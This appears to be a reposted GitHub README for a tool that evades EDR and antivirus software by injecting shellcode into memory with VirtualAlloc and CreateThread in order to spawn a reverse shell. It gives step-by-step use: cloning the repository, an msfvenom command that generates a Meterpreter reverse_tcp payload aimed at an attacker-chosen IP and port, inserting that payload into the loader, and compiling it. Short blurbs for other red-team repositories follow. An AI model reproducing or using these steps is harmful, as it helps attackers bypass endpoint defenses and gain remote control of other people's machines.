This repository contains a proof-of-concept (PoC) for bypassing EDR and antivirus solutions using a memory injection technique.
The code executes shellcode that spawns a reverse shell, successfully evading detection by various security mechanisms.
This project demonstrates how to bypass EDR and antivirus protection using Windows API functions such as VirtualAlloc
, CreateThread
, and WaitForSingleObject
.
The payload is injected directly into the process memory without being detected by security tools, establishing a connection to a remote system for a reverse shell.
VirtualAlloc
and CreateThread
to inject the payload directly into process memoryhttps://github.com/murat-exp/EDR-Antivirus-Bypass-to-Gain-Shell-Access.git
cd EDR-Antivirus-Bypass-Shell-Access
Before compiling, ensure that you modify the shellcode to point to your own IP address and port for the reverse shell. You can generate shellcode using msfvenom:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<YOUR_IP> LPORT=<YOUR_PORT> -f csharp
Replace the byte[] buf
section in Program.cs with the shellcode you just generated.
Open the project in Visual Studio, or use the following command to compile the code using the .NET SDK:
csc loader.cs
**Alternatively, you can compile in Release mode for better optimization:
csc -optimize loader.cs
For more information click here.
This repository will be used to add documents, pictures, etc on LEA efforts; Indictments, Seizure…
A cheat sheet for pentesters and researchers about deserialization vulnerabilities in various Java (JVM) serialization…
Short: a Red Team's SIEM. Longer: a Red Team's SIEM that serves two main goals:…
C# port of ZeroMemoryEx's Terminator, so all hail goes to him. Usage You can download…
We delve into the process of setting up a RedELK server, focusing on the critical…
The RedELK client components using Ansible, a powerful automation tool that streamlines the installation and…